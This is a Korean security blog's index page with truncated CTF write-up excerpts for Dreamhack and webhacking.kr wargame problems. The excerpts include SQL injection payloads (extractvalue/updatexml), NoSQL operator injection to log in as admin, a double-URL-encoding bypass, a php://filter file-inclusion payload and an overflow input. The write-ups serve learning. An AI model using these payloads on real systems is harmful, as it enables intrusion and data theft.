본문 바로가기

hacking sorcerer

(372)
드림핵 xss-1
드림핵 xss-2 아주 기본적인 문제이다 자 이제 시작해보자 var x=new URLSearchParams(location.search); document.getElementById('vuln').innerHTML = x.get('param'); ​ 아 설마 그 값 자체는 맞는데 innerHTML 자체에서 작동하지 않는 건가? 도 문법적으로 완벽한데 param = 위의 값을 넣어도 반응이 없는 것처럼 그런 거 아닐까? ​ 이를 보완하기 위해 HTML5에서는 innerHTML 속성을 통해 삽입된 문자열에 ​ ​ 역시나 방법은 두 가지 일 수밖에 없지 않나? 1) script를 교묘하게 바꾸어서 원하는 xss 문장을 집어넣거나 ->일단 이 경우의 수는 아닌 듯 하다 2) script를 쓰지 않고도 원하는 문장을 집어넣을 수 ..
드림핵 counting query id=~~~~~~&pw=pw&type=1 or 1=1 ​ id=~~~~~~~&pw=pw&type=1 and extractvalue(0xa,concat(0xa, @@version)) ​ id=~~~~&pw=pw&type=1 and extractvalue(0xa,concat(0xa, (select ps from t_user))) ​ id=~~~~~~~~&pw=pw&type=1 and extractvalue(0xa,concat(0xa, (select ps from all_user_accounts))) ​ id=~~~~~~&pw=pw&type=1 and updatexml(null,concat(0x3a,(select table_name from information_schema.tables),null) ​ 만약에..
드림핵 mango를 먹자 아래와 같이 요청을 보내면 guest 가 출력이 된다. /login?uid[$gt]=adm&upw[$ne]= // result: guest ​ guest 빼고 다른 결과를 보기 위해 $ne를 이용하여 결과 값에서 guest를 제외시킨다. 이번에는 dreamhack 이 출력된다. /login?uid[$gt]=adm&uid[$ne]=guest&upw[$ne]= // result: dreamhack ​ ​ 이번에는 $lt 를 이용하여 d 라는 문자 보다 작은 값을 출력하게끔 만든다. 그럼 dreamhack < d 는 false 이므로 dreamhack 이 출력 되지 않는다. 결과를 보면 성공적으로 admin 이 출력된다. /login?uid[$gt]=adm&uid[$ne]=guest&uid[$lt]=d&upw..
드림핵 session-basic 드림핵 session 때문에 이러저러 질문들이 계속 나와서 운영진 분들이 새로 만든 문제이다. 세션을 이해하기 좋은 문제이다. 이 문제는 session문제랑은 다르게 admin에게 할당되는 랜덤값이 매우 높게 설계되어 있다. 그런데 주어진 코드를 자세히보면 그 주어진 랜덤값을 아예 눈으로 보여주는 페이지가 따로 존재한다. 그 페이지로 들어가면 admin의 세션값이 나오고 그걸 통해서 세션을 변화해주기만 해도 플래그를 얻을 수 있다 ​ 드림핵 session 문제풀이는 이 블로그에 적어두었다. 잘 안 풀리시는 분들은 내 블로그 글에 댓글까지 읽어보시면 금방 플래그를 얻을 수 있다
드림핵 메모리 누수 문제 str을 정수로 변경하면 어떻게 값이 나오는지 궁금해지기 시작했다 처음부터 여기가 핵심이 된다고 생각했기 때문이다 str(0xdeadbeef)는 정수로 변경하면 (파이썬으로 그 값을 구할 수 있다) 3735928559이다 그런 식으로 순차적으로 값을 넣으면 ​ 1. Join 2. Print information 3. GIVE ME FLAG! >1 Name: AAAAAAAAAAAAAAAA (attack vector) Age: 3735928559 (attack vector) 1. Join 2. Print information 3. GIVE ME FLAG! > 3 1. Join 2. Print information 3. GIVE ME FLAG! > 2 Name: AAAAAAAAAAAAAAAA���DH{a77a..
웹해킹 26번 문제 주어진 php 코드를 보면 매우 간단하다 admin을 인코딩해서 값을 넣으면 그걸 자동으로 디코딩하기 때문에 한 번 더 인코딩해서 던져주면 php코드는 이를 admin으로 인식해서 결국 우회에 성공하게 된다 %2561%2564%256d%2569%256e
웹해킹 25번 문제 http://webhacking.kr:10001/?file==../../flag 다른 거에는 아무 반응도 없더니 위에 입력값에는 FLAG is in the code 이런 반응을 보였다 ​ php://filter/convert.base64-encode/resource=flag ?? 내가 php-1에서 봤던 php 명령어가 그대로 사용된다 이게 file vulnerability이라고 생각했는데 이 명령어가 그대로 사용될 줄은 상상도 못했다 ​ ​ 역시 이 다음 부분은 php-1과 완전히 같았다 사실 그렇게 치면 php-1이 이 문제를 오마주한 것일 지도 모르겠다 다만 리눅스 화면이 맨 처음에 등장하는 상태에서 php 명령어가 그대로 적용될 줄은 정말 몰랐다